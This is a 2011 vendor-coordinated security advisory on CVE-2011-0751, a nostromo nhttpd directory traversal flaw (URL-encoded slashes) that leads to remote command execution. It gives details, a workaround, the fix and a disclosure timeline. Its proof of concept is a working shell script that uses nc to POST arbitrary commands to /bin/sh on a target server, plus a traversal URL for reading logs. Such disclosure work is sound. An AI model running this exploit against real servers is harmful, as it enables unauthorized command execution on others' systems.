Nostromo 1.9.3 Directory Traversal

`Advisory: nostromo nhttpd directory traversal leading to arbitrary  
command execution  
  
During a penetration test, RedTeam Pentesting discovered a directory  
traversal vulnerability leading to arbitrary command execution in the  
nostromo HTTP server.  
  
  
Details  
=======  
  
Product: nostromo (nhttpd)  
Affected Versions: <= 1.9.3  
Fixed Versions: CVS 2011-03-03, 1.9.4  
Vulnerability Type: directory traversal  
Security Risk: high  
Vendor URL: http://www.nazgul.ch/dev_nostromo.html  
Vendor Status: patch available  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-001  
Advisory Status: published  
CVE: CVE-2011-0751  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0751  
  
  
Introduction  
============  
  
nhttpd is a simple, fast and secure HTTP server. It runs as a single  
process, handling connections with select(2). For CGIs and directory  
listing it does fork(2). nhttpd has the minimum of HTTP/1.1 and CGI/1.1  
implemented.  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
When parsing HTTP requests, nostromo first checks for directory  
traversal attempts by searching for /../ in the request URI. However  
this check is performed before decoding escaped characters in the URI.  
Thus, directory traversal is possible by e.g. escaping the slashes in  
../ as %2f.  
  
Unless the chroot feature of nostromo is used, any file in the system  
that is readable with the runtime permissions of nostromo can be  
accessed.  
  
A peculiarity of nostromo is the handling of CGI scripts. Citing the  
manual page, "CGIs are recognized by the file world executable flag".  
Therefore, any program or script, that is executable by the system user  
nostromo runs as, will be executed when one tries to access it through  
directory traversal. Any data received in the body of a HTTP POST  
request will be sent to standard input of executed CGI scripts.  
  
By using directory traversal to send a HTTP POST request to /bin/sh, and  
providing shell commands in the request body, arbitrary command  
execution is possible. Similarly, interpreters of programming languages  
that execute program code they receive via standard input, such as perl  
or python, can be used to execute arbitrary program code in those  
languages.  
  
  
Proof of Concept  
================  
  
The access log of nostromo can be accessed using an URL like this:  
http://www.example.org/..%2flogs/access_log  
  
The following simple shell script implements the arbitrary command  
execution described above using /bin/sh:  
  
------------------------------------------------------------------------  
#!/bin/sh  
######################################  
# #  
# RedTeam Pentesting GmbH #  
# [email protected] #  
# http://www.redteam-pentesting.de #  
# #  
######################################  
  
if [ $# -lt 3 ]; then  
echo "Usage: $(basename $0) HOST PORT COMMAND..."  
exit 2  
fi  
  
  
HOST="$1"  
PORT="$2"  
shift 2  
  
( \  
echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \  
echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \  
echo "$@ 2>&1" \  
) | nc "$HOST" "$PORT" \  
| sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
When serving static files, the impact of this vulnerability can be  
reduced by using the chroot feature of nostromo. If CGI scripts are  
used, any interpreter required for these scripts might allow being  
abused as shown above.  
The nostromo configuration and log files remain accessible even when  
using the chroot feature.  
  
  
Fix  
===  
  
Upgrade to development version from CVS as of 2011-03-03 or version  
1.9.4, once released.  
  
  
Security Risk  
=============  
  
As an attacker is potentially able to execute arbitrary commands  
remotely, the risk is estimated as high.  
  
  
History  
=======  
  
2011-01-12 Problem identified during a penetration test  
2011-01-20 Customer approves contacting vendor  
2011-01-26 CVE number requested  
2011-01-31 Vendor notified  
2011-02-02 CVE number assigned  
2011-02-05 Vendor confirmed the vulnerability and sent first patch for  
review  
2011-02-10 Vendor sent final patch for review  
2011-03-03 Vendor releases fix  
2011-03-15 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`